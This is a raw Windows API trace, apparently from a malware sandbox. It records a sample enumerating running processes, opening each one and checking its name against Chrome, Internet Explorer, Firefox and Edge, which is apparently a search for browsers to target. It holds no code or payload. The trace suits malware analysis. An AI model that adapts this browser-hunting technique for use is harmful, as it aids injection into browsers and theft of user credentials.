	[0236.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.538] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.538] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0236.538] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x785c
	[0236.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.539] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0236.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.539] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.539] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0236.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.539] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.540] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.540] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x7860
	[0236.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.541] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.541] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.541] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.542] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.542] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.543] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7864
	[0236.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.543] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.543] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.544] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.544] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.545] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x7868
	[0236.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.545] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.546] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.546] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.546] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.547] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x786c
	[0236.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.548] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.548] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.548] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.549] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.549] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.550] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x7870
	[0236.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.550] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.550] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.550] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.551] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.551] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.552] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7874
	[0236.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.552] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.553] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.553] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.554] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.554] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.555] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x7878
	[0236.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.555] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.555] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.556] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.556] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.556] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0236.557] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x787c
	[0236.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.557] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0236.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.557] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.558] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0236.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.558] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.558] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.560] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x7880
	[0236.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.560] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.561] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.561] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.561] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.561] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0236.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7884
	[0236.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.562] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.563] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.563] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.563] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.564] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0236.564] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x7888
	[0236.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.564] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0236.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.565] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.565] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0236.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.565] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.566] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.566] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x788c
	[0236.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.566] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.567] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.567] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.567] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.568] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0236.568] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7890
	[0236.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.569] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0236.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.569] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.569] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0236.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.570] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.570] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0236.571] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7894
	[0236.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.571] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0236.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.571] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.571] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0236.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.572] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.572] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0236.573] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x7898
	[0236.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.573] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0236.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.573] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.573] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0236.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.574] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.574] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0236.575] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x789c
	[0236.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.575] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0236.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.575] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.576] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0236.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.576] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.576] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0236.577] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0236.577] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0236.578] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x78a0
	[0236.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.578] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0236.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.579] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.579] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0236.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.580] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.580] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0236.581] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x78a4
	[0236.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.581] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0236.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.581] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.582] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0236.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.582] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.582] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0236.583] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x78a8
	[0236.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.583] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0236.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.584] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.584] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0236.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.584] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.584] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0236.585] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x78ac
	[0236.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.585] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0236.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.586] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.586] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0236.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.587] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.588] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0236.588] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x78b0
	[0236.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.589] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0236.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.589] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.590] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0236.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.591] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.591] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0236.592] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x78b4
	[0236.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.592] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0236.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.592] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.592] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0236.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.593] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.593] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0236.594] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x78b8
	[0236.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.594] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0236.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.595] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.595] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0236.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.596] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
